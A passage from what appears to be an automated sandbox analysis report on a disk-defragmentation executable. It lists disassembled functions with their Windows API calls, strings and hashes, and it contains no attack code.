                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ExtentMessagePoint32ReleaseSendText
                                                                                                                                                                                                                                                                                    • String ID: 8F
                                                                                                                                                                                                                                                                                    • API String ID: 3220701275-180763933
                                                                                                                                                                                                                                                                                    • Opcode ID: f4cd1229affaa01fb9d254a5843e7c69072dcfbfd1d68eba2fa87ff3b855b585
                                                                                                                                                                                                                                                                                    • Instruction ID: 1850dbf4910a2f6436d9a8060cce1c0b3c7b383cd418d825aeeea627d68539a0
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f4cd1229affaa01fb9d254a5843e7c69072dcfbfd1d68eba2fa87ff3b855b585
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 79213AB5604601AFC714DF68D985F6AB7E8FB8C710F008A2DF459C3690DB74E8448B95
                                                                                                                                                                                                                                                                                    Function 0041E180 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(PowrProf.dll,00000001,?,0042198D,00000002), ref: 0041E189
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetSuspendState), ref: 0041E19B
                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 0041E1B7
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                    • String ID: PowrProf.dll$SetSuspendState
                                                                                                                                                                                                                                                                                    • API String ID: 145871493-1420736420
                                                                                                                                                                                                                                                                                    • Opcode ID: cc42e22b2c3cdccf1d52a58f3ef6048082fefe304da44aace1865287b01325bc
                                                                                                                                                                                                                                                                                    • Instruction ID: 1295b46436a6d6ef84abe92a3e8f017b2096165fdcf3e5832b2fc3faa33b59df
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cc42e22b2c3cdccf1d52a58f3ef6048082fefe304da44aace1865287b01325bc
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2E04F357012606B527117366C48D9F2A68DFC1B91349467EF819D1294DF38C9828AAA
                                                                                                                                                                                                                                                                                    Function 00454C60 Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: __aullrem$__aulldiv
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3670715282-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 9c34d576a32de794e1e0b0d0fca0d0e7c205ee0b047ab4e09ce85ba4a67a3df8
                                                                                                                                                                                                                                                                                    • Instruction ID: fa94849079e70c1b34915df37323d6afc94868806176a113829b563514bd0fbf
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c34d576a32de794e1e0b0d0fca0d0e7c205ee0b047ab4e09ce85ba4a67a3df8
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43311775208305AFD200EA65E881D2FB3E9EBC8749F50491EF98497302D738FD498AB6
                                                                                                                                                                                                                                                                                    Function 0040F280 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Rect$Client$EventMouseTrack
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1879027383-0
                                                                                                                                                                                                                                                                                    • Opcode ID: f4e17d1d92922ba5e38ce16bca10ed58a203127cbb1472af428a1092aff2016b
                                                                                                                                                                                                                                                                                    • Instruction ID: 080451bb04fed4ed38a755b401fe0e9ad2b372c89e4fc55ac88ae6bf0dae2c00
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f4e17d1d92922ba5e38ce16bca10ed58a203127cbb1472af428a1092aff2016b
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 84115EB5104745AFD724CF64C848B9B77E8FB84304F10893EE88A87690E7B9E588CB95
                                                                                                                                                                                                                                                                                    Function 0046CF70 Relevance: 7.6, APIs: 5, Instructions: 55windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 0046CF84
                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 0046CFAB
                                                                                                                                                                                                                                                                                    • PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 0046CFCB
                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 0046CFDA
                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 0046CFF1
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ObjectSelect$Release
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3581861777-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 09afa59c7c7bf345e2bd9cfd905d74781f37247dddbab7f6bac84dc0e12143ed
                                                                                                                                                                                                                                                                                    • Instruction ID: daceeca4effa55fca9f5214fa6f3dce8251d9e38b51f783a69048b93fac7a53b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 09afa59c7c7bf345e2bd9cfd905d74781f37247dddbab7f6bac84dc0e12143ed
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 751115B5200601AFC314DFA9C9C8C27B7EAFF88600700C62DB94987601DB35FC45CB64
                                                                                                                                                                                                                                                                                    Function 00416430 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00416443
                                                                                                                                                                                                                                                                                    • InflateRect.USER32(?,00000002,00000002), ref: 00416452
                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 00416467
                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 0041647A
                                                                                                                                                                                                                                                                                    • InvalidateRect.USER32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,00000000,00478B80,000000FF,00416365), ref: 0041648D
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Rect$Parent$InflateInvalidateWindow
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3567486610-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 2204eff79a0e70798fbd603735b2eda6009dd2241c77b76db33bd6b2d1834c9f
                                                                                                                                                                                                                                                                                    • Instruction ID: 59621ce25ffcf61443309c609473fb22192222cc28d28fc8a60ac4e9d60af83f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2204eff79a0e70798fbd603735b2eda6009dd2241c77b76db33bd6b2d1834c9f
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9BF044B6100304BFC210EB74DC8AD6B77ACFBC8700F008A1DB58A87191EA74F540CB65
                                                                                                                                                                                                                                                                                    Function 00401220 Relevance: 7.5, APIs: 5, Instructions: 23COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00497DC0), ref: 0040122D
                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00497DC0), ref: 00401243
                                                                                                                                                                                                                                                                                    • GdiplusShutdown.GDIPLUS(00000000), ref: 0040124F
                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00497DC0), ref: 00401263
                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00497DC0), ref: 0040126A
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeave$GdiplusShutdown
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3506214061-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 7eae0b955cfe46139e040fd821d45967254a2c9d3517b53231cd44731b97ba61
                                                                                                                                                                                                                                                                                    • Instruction ID: 085117cba8507ed758f2e3bd9e34728127d7a1f2de7180c4966a7f221b9c7101
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7eae0b955cfe46139e040fd821d45967254a2c9d3517b53231cd44731b97ba61
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 16E0863166C2145ACA007BB6BC49B663F64AFC0B1471941BFE008B31E0C57855448FFD
                                                                                                                                                                                                                                                                                    Function 00422D50 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 178COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,BB40E64E,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                    • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 00422F48
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CriticalEnterRedrawSectionWindow
                                                                                                                                                                                                                                                                                    • String ID: DiskChecked$DiskDefrag$`=
                                                                                                                                                                                                                                                                                    • API String ID: 142774367-3347577070
                                                                                                                                                                                                                                                                                    • Opcode ID: 59c7556ff35f631bf204cef4fa8707c16d05c0d1fb6d4562dda13db1bf437196
                                                                                                                                                                                                                                                                                    • Instruction ID: fed9d3ca3bfe53db5501e1f63bebbc1333baccd255b2eb749adb8bf470123f53
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 59c7556ff35f631bf204cef4fa8707c16d05c0d1fb6d4562dda13db1bf437196
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E151A43170061AABC31CEF6CD995AA9F3A1BB84300F85862EED158B781D7B4B951DBC4
                                                                                                                                                                                                                                                                                    Function 0040C4D0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 171COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: Back$GUBar::CDrawObjectFactory::CreateRectTextDraw$Text
                                                                                                                                                                                                                                                                                    • API String ID: 0-2901586747
                                                                                                                                                                                                                                                                                    • Opcode ID: b1efb13953a751cb5c03bbcbe7c56556e47a523d44cd9f1edb886f055ae568a6
                                                                                                                                                                                                                                                                                    • Instruction ID: 94c29d93b79a1152409cb834b352fc504edd985983e521adcc95b20eb26bf893
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b1efb13953a751cb5c03bbcbe7c56556e47a523d44cd9f1edb886f055ae568a6
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6514F75604315EFC710DF25C880A6BB7E8EB88754F104A2EF84997380E779ED458B9A
                                                                                                                                                                                                                                                                                    Function 0041D750 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • #2.OLEAUT32(80000001,DiskDefrag\Setting Option\Exclude,?,?,?,?,00427EC2,BB40E64E), ref: 0041D7DA
                                                                                                                                                                                                                                                                                    • #9.OLEAUT32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000), ref: 0041D807
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: DiskDefrag\Setting Option\Exclude$`=
                                                                                                                                                                                                                                                                                    • API String ID: 0-3794877113
                                                                                                                                                                                                                                                                                    • Opcode ID: a4280b9b7dc6183126e2422d7be14f92861be999e049e1a1ed44a2a1cceede15
                                                                                                                                                                                                                                                                                    • Instruction ID: 1b5e8dd470563cbc387b5fcd8bef698c16006e04536aa332a21aa0bb045417de
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a4280b9b7dc6183126e2422d7be14f92861be999e049e1a1ed44a2a1cceede15
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9041A371504245AFD304EF55CD85EABBBF8FF88348F00092EF95A82250EB75E944CBA6
                                                                                                                                                                                                                                                                                    Function 004238A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 137COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetSystemPowerStatus.KERNEL32 ref: 00423907
                                                                                                                                                                                                                                                                                    • GetLongPathNameW.KERNEL32(00000001,00000000), ref: 004239E8
                                                                                                                                                                                                                                                                                    • GetLongPathNameW.KERNEL32(BB40E64E,00000000), ref: 00423A15
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: LongNamePath$PowerStatusSystem
                                                                                                                                                                                                                                                                                    • String ID: 3400003
                                                                                                                                                                                                                                                                                    • API String ID: 2229323602-2398869336
                                                                                                                                                                                                                                                                                    • Opcode ID: 057325de7599dd7353c85ea60434a88cbbf49cf5f83a7ab393cd0de2b9172bd1
